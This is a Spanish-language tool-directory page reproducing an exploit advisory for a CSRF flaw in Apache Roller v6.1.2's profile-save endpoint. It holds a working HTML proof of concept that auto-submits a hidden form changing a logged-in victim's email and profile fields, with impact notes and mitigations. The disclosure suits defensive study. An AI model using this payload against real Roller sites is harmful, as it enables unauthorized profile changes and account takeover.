Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/vanlam2001/roller-csrf
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubvanlam2001/roller-csrf

roller-csrf

Ver Repositorio
hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Apache Roller v6.1.2 - Falsificación de Solicitudes entre Sitios (CSRF) en la Actualización de Perfil

Detalles de la Vulnerabilidad

  • Versión: v6.1.2
  • Fecha: 2025-11-09
  • Autor del Exploit: Van Lam Nguyen
  • Facebook: https://www.facebook.com/vanlam1412
  • Página del Proveedor: https://roller.apache.org
  • Enlace del Software: https://github.com/apache/roller/archive/refs/tags/roller-6.1.2.zip
  • Probado en: Windows
  • CVE: N/A
  • Demostración: https://youtu.be/iPEiVzcpJJU

Resumen

Se descubrió que Roller v6.1.2 y versiones anteriores contienen una vulnerabilidad de Falsificación de Solicitudes entre Sitios (CSRF) en el endpoint /roller/roller-ui/profile!save.rol.

Esta vulnerabilidad permite a los atacantes actualizar arbitrariamente la información del perfil del usuario víctima (por ejemplo, correo electrónico, nombre completo, locale, zona horaria) mediante una página HTML manipulada.

Prueba de Concepto

La vulnerabilidad permite solicitudes no autorizadas a /roller/roller-ui/profile!save.rol que actualizan el perfil del usuario sin protección CSRF.

Código HTML del Exploit

root@kitploit:~
<html>
<head>
    <form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
        <input name="bean.userName" value="vanlam" type="hidden">
        <input name="bean.screenName" value="hacked" type="hidden">
        <input name="bean.fullName" value="hacked" type="hidden">
        <input name="bean.emailAddress" value="[email protected]" type="hidden">
        <input name="bean.passwordText" value="" type="hidden">
        <input name="bean.passwordConfirm" value="" type="hidden">
        <input name="bean.locale" value="vi_VN" type="hidden">
        <input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
    </form>

    <script>
        document.getElementById('exploitForm').submit();
    </script>
</head>
</html>

Parámetros del Formulario

  • bean.userName: vanlam
  • bean.screenName: hacked
  • bean.fullName: hacked
  • bean.emailAddress: [email protected]
  • bean.passwordText: (vacío)
  • bean.passwordConfirm: (vacío)
  • bean.locale: vi_VN
  • bean.timeZone: Asia/Bangkok

Impacto

Un atacante puede crear una página HTML maliciosa que, cuando la visita un usuario autenticado de Roller, enviará automáticamente un formulario para actualizar la información del perfil de la víctima sin su consentimiento. Esto puede provocar:

  • Cambios no autorizados en los datos del perfil del usuario
  • Posible toma de control de la cuenta si se cambia la dirección de correo electrónico
  • Interrupción de la experiencia del usuario mediante cambios de locale y zona horaria

Mitigación

  • Implementar tokens CSRF para todas las solicitudes que cambian el estado
  • Validar las cabeceras Origin y Referer
  • Utilizar cookies de mismo sitio (SameSite)
  • Implementar comprobaciones adecuadas de autenticación y autorización
Descargar herramienta